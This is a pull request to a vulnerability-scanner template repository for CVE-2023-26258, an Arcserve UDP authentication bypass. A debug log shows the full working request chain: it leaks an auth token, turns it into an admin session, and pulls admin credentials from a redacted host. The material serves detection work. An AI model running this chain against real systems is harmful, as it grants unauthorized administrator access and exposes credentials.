### PR TITLE
Add CVE-2023-26258 (vKEV)

### DIFF
--- a/http/cves/2023/CVE-2023-26258.yaml
+++ b/http/cves/2023/CVE-2023-26258.yaml
@@ -20,7 +20,7 @@ info:
     max-request: 3
     vendor: arcserve
     product: udp
-    shodan-query: 'vuln:CVE-2022-34155'
+    shodan-query: http.favicon.hash:-1889244460
   tags: cve,cve2023,arcserve,auth-bypass,vkev
 
 flow: http(1) && http(2)
@@ -35,18 +35,18 @@ http:
         <?xml version="1.0" encoding="UTF-8"?>
         <S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/">
           <S:Body>
-            <ns2:getVersionInfo 
-                xmlns:ns2="http://webservice.arcflash.ca.com" 
-                xmlns:ns3="http://backup.data.webservice.arcflash.ca.com/xsd" 
-                xmlns:ns4="http://data.webservice.arcflash.ca.com/xsd" 
-                xmlns:ns5="http://export.data.webservice.arcflash.ca.com/xsd" 
-                xmlns:ns6="http://vsphere.data.webservice.arcflash.ca.com/xsd" 
-                xmlns:ns7="http://browse.data.webservice.arcflash.ca.com/xsd" 
-                xmlns:ns8="http://restore.data.webservice.arcflash.ca.com/xsd" 
-                xmlns:ns9="http://catalog.data.webservice.arcflash.ca.com/xsd" 
-                xmlns:ns10="http://activitylog.data.webservice.arcflash.ca.com/xsd" 
-                xmlns:ns11="http://remotedeploy.data.webservice.arcflash.ca.com/xsd" 
-                xmlns:ns12="http://history.job.data.webservice.arcflash.ca.com/xsd" 
+            <ns2:getVersionInfo
+                xmlns:ns2="http://webservice.arcflash.ca.com"
+                xmlns:ns3="http://backup.data.webservice.arcflash.ca.com/xsd"
+                xmlns:ns4="http://data.webservice.arcflash.ca.com/xsd"
+                xmlns:ns5="http://export.data.webservice.arcflash.ca.com/xsd"
+                xmlns:ns6="http://vsphere.data.webservice.arcflash.ca.com/xsd"
+                xmlns:ns7="http://browse.data.webservice.arcflash.ca.com/xsd"
+                xmlns:ns8="http://restore.data.webservice.arcflash.ca.com/xsd"
+                xmlns:ns9="http://catalog.data.webservice.arcflash.ca.com/xsd"
+                xmlns:ns10="http://activitylog.data.webservice.arcflash.ca.com/xsd"
+                xmlns:ns11="http://remotedeploy.data.webservice.arcflash.ca.com/xsd"
+                xmlns:ns12="http://history.job.data.webservice.arcflash.ca.com/xsd"
                 xmlns:ns13="http://webservice.edge.arcserve.ca.com/"/>
           </S:Body>
         </S:Envelope>
@@ -79,18 +79,18 @@ http:
         <?xml version="1.0" encoding="UTF-8"?>
         <S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/">
           <S:Body>
-            <ns2:validateUserByUUID 
-                xmlns:ns2="http://webservice.arcflash.ca.com" 
-                xmlns:ns3="http://backup.data.webservice.arcflash.ca.com/xsd" 
-                xmlns:ns4="http://data.webservice.arcflash.ca.com/xsd" 
-                xmlns:ns5="http://export.data.webservice.arcflash.ca.com/xsd" 
-                xmlns:ns6="http://vsphere.data.webservice.arcflash.ca.com/xsd" 
-                xmlns:ns7="http://browse.data.webservice.arcflash.ca.com/xsd" 
-                xmlns:ns8="http://restore.data.webservice.arcflash.ca.com/xsd" 
-                xmlns:ns9="http://catalog.data.webservice.arcflash.ca.com/xsd" 
-                xmlns:ns10="http://activitylog.data.webservice.arcflash.ca.com/xsd" 
-                xmlns:ns11="http://remotedeploy.data.webservice.arcflash.ca.com/xsd" 
-                xmlns:ns12="http://history.job.data.webservice.arcflash.ca.com/xsd" 
+            <ns2:validateUserByUUID
+                xmlns:ns2="http://webservice.arcflash.ca.com"
+                xmlns:ns3="http://backup.data.webservice.arcflash.ca.com/xsd"
+                xmlns:ns4="http://data.webservice.arcflash.ca.com/xsd"
+                xmlns:ns5="http://export.data.webservice.arcflash.ca.com/xsd"
+                xmlns:ns6="http://vsphere.data.webservice.arcflash.ca.com/xsd"
+                xmlns:ns7="http://browse.data.webservice.arcflash.ca.com/xsd"
+                xmlns:ns8="http://restore.data.webservice.arcflash.ca.com/xsd"
+                xmlns:ns9="http://catalog.data.webservice.arcflash.ca.com/xsd"
+                xmlns:ns10="http://activitylog.data.webservice.arcflash.ca.com/xsd"
+                xmlns:ns11="http://remotedeploy.data.webservice.arcflash.ca.com/xsd"
+                xmlns:ns12="http://history.job.data.webservice.arcflash.ca.com/xsd"
                 xmlns:ns13="http://webservice.edge.arcserve.ca.com/">
                 <arg0>{{auth_uuid}}</arg0>
             </ns2:validateUserByUUID>


### PR DESCRIPTION
### Template / PR Information

Arcserve UDP through 9.0.6034 allows authentication bypass. The method getVersionInfo at WebServiceImpl/services/FlashServiceImpl leaks the AuthUUID token. This token can be used at /WebServiceImpl/services/VirtualStandbyServiceImpl to obtain a valid session. This session can be used to execute any task as administrator.

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Debug
```

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2023-26258] Dumped HTTP request for http://redacted:8014/WebServiceImpl/services/FlashServiceImpl

POST /WebServiceImpl/services/FlashServiceImpl HTTP/1.1
Host: redacted:8014
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.1
Connection: close
Content-Length: 1025
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?>
<S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/">
  <S:Body>
    <ns2:getVersionInfo 
        xmlns:ns2="http://webservice.arcflash.ca.com" 
        xmlns:ns3="http://backup.data.webservice.arcflash.ca.com/xsd" 
        xmlns:ns4="http://data.webservice.arcflash.ca.com/xsd" 
        xmlns:ns5="http://export.data.webservice.arcflash.ca.com/xsd" 
        xmlns:ns6="http://vsphere.data.webservice.arcflash.ca.com/xsd" 
        xmlns:ns7="http://browse.data.webservice.arcflash.ca.com/xsd" 
        xmlns:ns8="http://restore.data.webservice.arcflash.ca.com/xsd" 
        xmlns:ns9="http://catalog.data.webservice.arcflash.ca.com/xsd" 
        xmlns:ns10="http://activitylog.data.webservice.arcflash.ca.com/xsd" 
        xmlns:ns11="http://remotedeploy.data.webservice.arcflash.ca.com/xsd" 
        xmlns:ns12="http://history.job.data.webservice.arcflash.ca.com/xsd" 
        xmlns:ns13="http://webservice.edge.arcserve.ca.com/"/>
  </S:Body>
</S:Envelope>
[DBG] [CVE-2023-26258] Dumped HTTP response http://redacted:8014/WebServiceImpl/services/FlashServiceImpl

HTTP/1.1 200 
Connection: close
Transfer-Encoding: chunked
Content-Type: text/xml;charset=utf-8
Date: Fri, 19 Sep 2025 17:32:12 GMT
Server: Apache/2.4.48 (Win32) OpenSSL/1.1.1k

<?xml version='1.0' encoding='UTF-8'?><S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/"><S:Body><ns2:getVersionInfoResponse xmlns:ns2="http://webservice.arcflash.ca.com" xmlns:ns3="http://history.job.data.webservice.arcflash.ca.com/xsd" xmlns:ns4="http://vsphere.data.webservice.arcflash.ca.com/xsd" xmlns:ns5="http://data.webservice.arcflash.ca.com/xsd" xmlns:ns6="http://backup.data.webservice.arcflash.ca.com/xsd" xmlns:ns7="http://browse.data.webservice.arcflash.ca.com/xsd" xmlns:ns8="http://restore.data.webservice.arcflash.ca.com/xsd" xmlns:ns9="http://catalog.data.webservice.arcflash.ca.com/xsd" xmlns:ns10="http://export.data.webservice.arcflash.ca.com/xsd" xmlns:ns11="http://remotedeploy.data.webservice.arcflash.ca.com/xsd" xmlns:ns12="http://activitylog.data.webservice.arcflash.ca.com/xsd" xmlns:ns13="http://webservice.edge.arcserve.ca.com/"><ns2:return><ns5:majorVersion>8</ns5:majorVersion><ns5:minorVersion>0</ns5:minorVersion><ns5:buildNumber>5628</ns5:buildNumber><ns5:locale>en</ns5:locale><ns5:country></ns5:country><ns5:timeZoneID>XXXX/YYYY</ns5:timeZoneID><ns5:timeZoneOffset>36000000</ns5:timeZoneOffset><ns5:adminName>admin</ns5:adminName><ns5:localDriverLetters>C:\</ns5:localDriverLetters><ns5:localDriverLetters>D:\</ns5:localDriverLetters><ns5:localDriverLetters>E:\</ns5:localDriverLetters><ns5:localDriverLetters>F:\</ns5:localDriverLetters><ns5:localDriverLetters>S:\</ns5:localDriverLetters><ns5:localADTPackage>-1</ns5:localADTPackage><ns5:updateNumber>1</ns5:updateNumber><ns5:updateBuildNumber>430</ns5:updateBuildNumber><ns5:productType>2</ns5:productType><ns5:edgeInfoCM><ns5:edgeHostName>server</ns5:edgeHostName><ns5:edgeUrl>http://server:8015/management/</ns5:edgeUrl></ns5:edgeInfoCM><ns5:dataFormat><ns5:timeFormat>h:mm:ss a</ns5:timeFormat><ns5:shortTimeFormat>h:mm a</ns5:shortTimeFormat><ns5:timeDateFormat>d/MM/yyyy h:mm:ss a</ns5:timeDateFormat><ns5:dateFormat>d/MM/yyyy</ns5:dateFormat></ns5:dataFormat><ns5:isX86>false</ns5:isX86><ns5:isHyperVRoleInstalled>false</ns5:isHyperVRoleInstalled><ns5:isDedupInstalled>false</ns5:isDedupInstalled><ns5:isWin8>true</ns5:isWin8><ns5:isReFsSupported>true</ns5:isReFsSupported><ns5:osName>Windows Server 2012 R2 Standard</ns5:osName><ns5:hostName>Server</ns5:hostName><ns5:osMajorVersion>6</ns5:osMajorVersion><ns5:osMinorVersion>3</ns5:osMinorVersion><ns5:osBuildNumber>9600</ns5:osBuildNumber><ns5:uefiFirmware>false</ns5:uefiFirmware><ns5:SQLServerInstalled>true</ns5:SQLServerInstalled><ns5:ExchangeInstalled>false</ns5:ExchangeInstalled><ns5:D2DInstalled>true</ns5:D2DInstalled><ns5:ARCserveBackInstalled>false</ns5:ARCserveBackInstalled><ns5:RPSInstalled>true</ns5:RPSInstalled><ns5:settingConfiged>true</ns5:settingConfiged><ns5:dotNetVersion>4.8</ns5:dotNetVersion><ns5:displayVersion>8.1</ns5:displayVersion><ns5:isInCloud>false</ns5:isInCloud><ns5:nodeUUID>xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx</ns5:nodeUUID><ns5:authUUID>yyyyyyyy-yyyy-yyyy-yyyy-yyyyyyyyyyyy</ns5:authUUID></ns2:return></ns2:getVersionInfoResponse></S:Body></S:Envelope>
[INF] [CVE-2023-26258] Dumped HTTP request for http://redacted:8014/WebServiceImpl/services/VirtualStandbyServiceImpl

POST /WebServiceImpl/services/VirtualStandbyServiceImpl HTTP/1.1
Host: redacted:8014
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6,2 Mobile/15E148 Safari/604.1
Connection: close
Content-Length: 1118
Content-Type: text/xml
SOAPAction: "<http://webservice.arcflash.ca.com/IEdgeDashboardService/validateUserByUUIDRequest>"
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?>
<S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/">
  <S:Body>
    <ns2:validateUserByUUID 
        xmlns:ns2="http://webservice.arcflash.ca.com" 
        xmlns:ns3="http://backup.data.webservice.arcflash.ca.com/xsd" 
        xmlns:ns4="http://data.webservice.arcflash.ca.com/xsd" 
        xmlns:ns5="http://export.data.webservice.arcflash.ca.com/xsd" 
        xmlns:ns6="http://vsphere.data.webservice.arcflash.ca.com/xsd" 
        xmlns:ns7="http://browse.data.webservice.arcflash.ca.com/xsd" 
        xmlns:ns8="http://restore.data.webservice.arcflash.ca.com/xsd" 
        xmlns:ns9="http://catalog.data.webservice.arcflash.ca.com/xsd" 
        xmlns:ns10="http://activitylog.data.webservice.arcflash.ca.com/xsd" 
        xmlns:ns11="http://remotedeploy.data.webservice.arcflash.ca.com/xsd" 
        xmlns:ns12="http://history.job.data.webservice.arcflash.ca.com/xsd" 
        xmlns:ns13="http://webservice.edge.arcserve.ca.com/">
        <arg0>yyyyyyyy-yyyy-yyyy-yyyy-yyyyyyyyyyyy</arg0>
    </ns2:validateUserByUUID>
  </S:Body>
</S:Envelope>
[DBG] [CVE-2023-26258] Dumped HTTP response http://redacted:8014/WebServiceImpl/services/VirtualStandbyServiceImpl

HTTP/1.1 200 
Connection: close
Transfer-Encoding: chunked
Content-Type: text/xml;charset=utf-8
Date: Fri, 19 Sep 2025 17:32:12 GMT
Server: Apache/2.4.48 (Win32) OpenSSL/1.1.1k
Set-Cookie: AGENTJSESSIONID=10DB755884D6D6D88D746F7DA8A04396; Path=/WebServiceImpl; HttpOnly

<?xml version='1.0' encoding='UTF-8'?><S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/"><S:Body><ns2:validateUserByUUIDResponse xmlns:ns2="http://webservice.arcflash.ca.com" xmlns:ns3="http://data.webservice.arcflash.ca.com/xsd"><ns2:return>0</ns2:return></ns2:validateUserByUUIDResponse></S:Body></S:Envelope>
[INF] [CVE-2023-26258] Dumped HTTP request for http://redacted:8014/WebServiceImpl/services/FlashServiceImpl

POST /WebServiceImpl/services/FlashServiceImpl HTTP/1.1
Host: redacted:8014
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15
Connection: close
Content-Length: 1069
Content-Type: text/xml
Cookie: AGENTJSESSIONID=10DB755884D6D6D88D746F7DA8A04396
SOAPAction: "<http://webservice.arcflash.ca.com/IFlashService_R16_5/getVersionInfoRequest>"
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?>
  <S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/">
    <S:Body>
      <ns2:getLocalHostAsTrust
        xmlns:ns2="http://webservice.arcflash.ca.com"
        xmlns:ns3="http://backup.data.webservice.arcflash.ca.com/xsd"
        xmlns:ns4="http://data.webservice.arcflash.ca.com/xsd"
        xmlns:ns5="http://export.data.webservice.arcflash.ca.com/xsd"
        xmlns:ns6="http://vsphere.data.webservice.arcflash.ca.com/xsd"
        xmlns:ns7="http://browse.data.webservice.arcflash.ca.com/xsd"
        xmlns:ns8="http://restore.data.webservice.arcflash.ca.com/xsd"
        xmlns:ns9="http://catalog.data.webservice.arcflash.ca.com/xsd"
        xmlns:ns10="http://activitylog.data.webservice.arcflash.ca.com/xsd"
        xmlns:ns11="http://remotedeploy.data.webservice.arcflash.ca.com/xsd"
        xmlns:ns12="http://history.job.data.webservice.arcflash.ca.com/xsd"
        xmlns:ns13="http://webservice.edge.arcserve.ca.com/"
      >
      </ns2:getLocalHostAsTrust>
    </S:Body>
  </S:Envelope>
[DBG] [CVE-2023-26258] Dumped HTTP response http://redacted:8014/WebServiceImpl/services/FlashServiceImpl

HTTP/1.1 200 
Connection: close
Transfer-Encoding: chunked
Content-Type: text/xml;charset=utf-8
Date: Fri, 19 Sep 2025 17:32:13 GMT
Server: Apache/2.4.48 (Win32) OpenSSL/1.1.1k

<?xml version='1.0' encoding='UTF-8'?><S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/"><S:Body><ns2:getLocalHostAsTrustResponse xmlns:ns2="http://webservice.arcflash.ca.com" xmlns:ns3="http://history.job.data.webservice.arcflash.ca.com/xsd" xmlns:ns4="http://vsphere.data.webservice.arcflash.ca.com/xsd" xmlns:ns5="http://data.webservice.arcflash.ca.com/xsd" xmlns:ns6="http://backup.data.webservice.arcflash.ca.com/xsd" xmlns:ns7="http://browse.data.webservice.arcflash.ca.com/xsd" xmlns:ns8="http://restore.data.webservice.arcflash.ca.com/xsd" xmlns:ns9="http://catalog.data.webservice.arcflash.ca.com/xsd" xmlns:ns10="http://export.data.webservice.arcflash.ca.com/xsd" xmlns:ns11="http://remotedeploy.data.webservice.arcflash.ca.com/xsd" xmlns:ns12="http://activitylog.data.webservice.arcflash.ca.com/xsd" xmlns:ns13="http://webservice.edge.arcserve.ca.com/"><ns2:return><ns5:name>SERVER</ns5:name><ns5:port>0</ns5:port><ns5:uuid> TkVGQRAHCSAYAAAAEGYAABIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</ns5:uuid><ns5:userName>admin</ns5:userName><ns5:password>TkVGQRAHCSAYAAAAEGYAABIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</ns5:password><ns5:type>0</ns5:type><ns5:d2dVersion>8</ns5:d2dVersion></ns2:return></ns2:getLocalHostAsTrustResponse></S:Body></S:Envelope>
[CVE-2023-26258:dsl-1] [http] [critical] http://redacted:8014/WebServiceImpl/services/FlashServiceImpl ["admin","TkVGQRAHCSAYAAAAEGYAABIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"]
[INF] Scan completed in 1.646588875s. 1 matches found.
```